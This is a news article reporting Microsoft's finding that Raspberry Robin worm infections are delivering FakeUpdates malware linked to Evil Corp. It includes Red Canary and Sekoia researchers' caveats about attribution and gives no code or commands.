Microsoft’s security team published evidence this week tying the Raspberry Robin malware to Russian cybercrime syndicate Evil Corp.
In an update to a May report on the ransomware-as-a-service industry, Microsoft Threat Intelligence Center (MSTIC) said some existing Raspberry Robin infections are being used to deploy FakeUpdates, a malware downloader in activity suspected to be linked to Evil Corp.
Raspberry Robin was discovered in September 2021 by researchers from cybersecurity company Red Canary, which coined the name for the cluster of activity they were seeing.
The activity involved a worm that is often installed through USB drives and relies on msiexec.exe to call out to its infrastructure, which Red Canary said is often connected to compromised QNAP devices.
Microsoft said its researchers discovered that the FakeUpdates malware was being delivered via existing Raspberry Robin infections on July 26.
“The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior.”
Microsoft refers to Evil Corp as DEV-0243 and DEV-0206 is an unnamed access broker identified by the company.
BleepingComputer reported earlier this month that Microsoft sent a private threat intelligence advisory to Microsoft Defender for Endpoint subscribers that the Raspberry Robin worm was found on Windows devices within networks at hundreds of organizations in dozens of industries.
Cybersecurity company Sekoia released its own report confirming that it found Raspberry Robin on QNAP NAS devices. In Red Canary’s initial report on Raspberry Robin, they found that it was targeted at organizations with ties to technology and manufacturing.
Katie Nickels, director of intelligence at Red Canary, told The Record that Microsoft’s finding, if accurate, has filled a “major gap” with Raspberry Robin because no one had previously discovered any later-stage activity or found evidence linking it with any person or entity.
“Many organizations have observed and publicly discussed Raspberry Robin’s initial execution behaviors, but there remained a major gap in that no one seems to have observed any later-stage activity—like an eventual payload,” Nickels said.
“Microsoft’s finding that Raspberry Robin has deployed malware called FakeUpdates/SocGholish is an interesting development. Microsoft is certainly credible, but we can’t independently verify their claim at this time.”
Nickels added that it continues to see activity from Raspberry Robin but has not been able to associate it with any specific person, company, entity, or country, noting that it’s “too early to say if Evil Corp is responsible for, or associated with, Raspberry Robin.”
She explained that the ransomware-as-a-service ecosystem is complex and different criminal groups often partner with one another to achieve a variety of objectives, making it difficult to work out relationships between malware families and observed activity.
“Microsoft’s findings suggest that the adversaries behind Raspberry Robin may have some kind of relationship with DEV-0206 and DEV-0243, two groups tracked by Microsoft, but the exact nature of that relationship is unclear,” she said.
According to Nickels, Red Canary has not directly observed Raspberry Robin spreading FakeUpdates and is not aware of any clear connection to Evil Corp, DEV-0206, or DEV-0243.
“But we’re watching to see if more evidence emerges to solidify these relationships or if they were simply one-time occurrences,” she said.
Félix Aimé, a member of the threat intelligence team at Sekoia, noted that the main issue with Raspberry Robin revolves around the fact that thousands of infected USB devices are out in the wild and can “download arbitrary payloads from dozen of domain names that can be easily hijacked or re-purposed by malicious actors.”
Evil Corp is known for its connections to multiple ransomware groups – including Bitpaymer, DopplePaymer, WastedLocker and Clop – as well as other cybercrime activity. It was sanctioned by the US Treasury Department in December 2019.
In Microsoft’s report this week, the company noted that Evil Corp has begun to deploy the LockBit 2.0 RaaS payload during attacks “likely an attempt…to avoid attribution to their group, which could discourage payment due to their sanctioned status.”